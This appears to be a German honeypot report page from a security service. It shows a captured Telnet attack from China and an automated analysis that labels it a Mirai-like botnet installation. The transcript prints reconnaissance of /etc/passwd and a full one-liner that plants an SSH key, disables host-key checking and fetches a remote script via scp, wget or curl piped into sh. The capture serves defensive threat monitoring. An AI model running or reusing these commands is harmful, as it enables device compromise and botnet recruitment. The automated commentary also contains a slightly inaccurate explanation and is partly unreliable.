ALLSmartSecurity
Mitschnitt

Telnet-Angriff aus Volksrepublik China: Schadcode nachladen und Benutzerliste auslesen

02.10.2026, 01:13 UTC · 16 Befehle · über telnet · Volksrepublik China

Überblick

Dienst
telnet (Port 23)
Herkunft
Volksrepublik China · CHINA UNICOM China169 Backbone
Probierte Zugangsdaten
admin / admin

Der Angriff, nachgespielt

echter Mitschnitt unserer Fake-Shell; die Antworten sind erfunden, ausgefuehrt wurde nie etwas
admin@srv01: ~

admin@srv01:~$ id
uid=1000(admin) gid=1000(admin) groups=1000(admin)
admin@srv01:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr
admin@srv01:~$ echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"
auth_ok
admin@srv01:~$ enable
bash: enable: command not found
admin@srv01:~$ system
bash: system: command not found
admin@srv01:~$ shell
bash: shell: command not found
admin@srv01:~$ sh
admin@srv01:~$ bash
admin@srv01:~$ cd /tmp || cd /var/tmp || cd /dev/shm; echo '-----BEGIN OPENSSH PRIVATE KEY-----
bash: syntax error near unexpected token `||'
'-----BEGIN OPENSSH PRIVATE KEY-----
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ [Token]
bash: [Token]: command not found
admin@srv01:~$ -----END OPENSSH PRIVATE KEY-----' > key.ppk; echo 'StrictHostKeyChecking no
bash: syntax error near unexpected token `newline'
'StrictHostKeyChecking no
admin@srv01:~$ UserKnownHostsFile /dev/null' > sshcfg; chmod 400 key.ppk; scp -s -F sshcfg -i key.ppk [E-Mail]:sh out_sh; if [ $? -eq 0 ]; then chmod +x out_sh; sh out_sh telnet >/dev/null 2>&1; else (wget --no-check-certificate -qO- https://[IP]/sh || curl -sk https://[IP]/sh) | sh -s telnet; fi; rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\…
bash: syntax error near unexpected token `newline'
'rm -rf sshcfg key.ppk out_sh; echo -e "\x72\x65\x64\x74\x61\x69\x6C\x5F\x62\x6F\x74\x5F\x74\x65\x6C\x6E\x65\x74\x5F\x6F\x6B"
redtail_bot_telnet_ok

Was hier passiert ist

automatisch erstellte Einschätzung, keine Gewähr

Was versucht wurde

Ein Angreifer meldete sich über Telnet mit den Standardzugangsdaten admin und admin an. Nach einer kurzen Erkundung der Systemumgebung versuchte er, eine SSH-Schlüsseldatei sowie eine Konfigurationsdatei im temporären Verzeichnis anzulegen. Anschließend wurde versucht, ein Skript von einem externen Server herunterzuladen und auszuführen, wobei verschiedene Download-Methoden als Fallback dienten.

Was die Befehle bewirken

Die Befehle id und cat /etc/passwd dienen der Identifikation des Benutzers und der Ausspähung lokaler Kontodaten. Der Befehl echo -e schreibt eine Hexadezimalfolge, die vermutlich eine Bestätigung oder ein Trigger-Signal darstellt. Die folgenden Befehle enable, system, shell und sh deuten auf einen Versuch hin, in eine privilegierte Shell oder ein spezifisches Systemmenü zu wechseln. Der lange Befehl erstellt eine private SSH-Schlüsseldatei und eine SSH-Konfiguration, die die Host-Prüfung deaktiviert, um Man-in-the-Middle-Angriffe zu umgehen. Abschließend wird versucht, eine Datei namens out_sh über scp oder wget/curl von einem externen Server zu laden und direkt als Shell-Skript auszuführen.

Worauf es hinauslief

Das Ziel war vermutlich die Installation einer Malware oder eines Botnet-Agents auf dem kompromittierten Gerät. Dies erkennt man an der automatisierten Herunterladung eines Skripts von einer externen IP-Adresse und dessen sofortiger Ausführung. Solche Angriffe dienen oft der Bildung von Botnetzen für DDoS-Attacken oder dem Kryptomining.

Einordnung

Dieses Muster ist bei automatisierten Botnetzen wie Mirai oder seinen Varianten sehr verbreitet. Die Nutzung von Standardpasswörtern und die direkte Ausführung von Skripten über Telnet sind typische Merkmale dieser Angriffsart.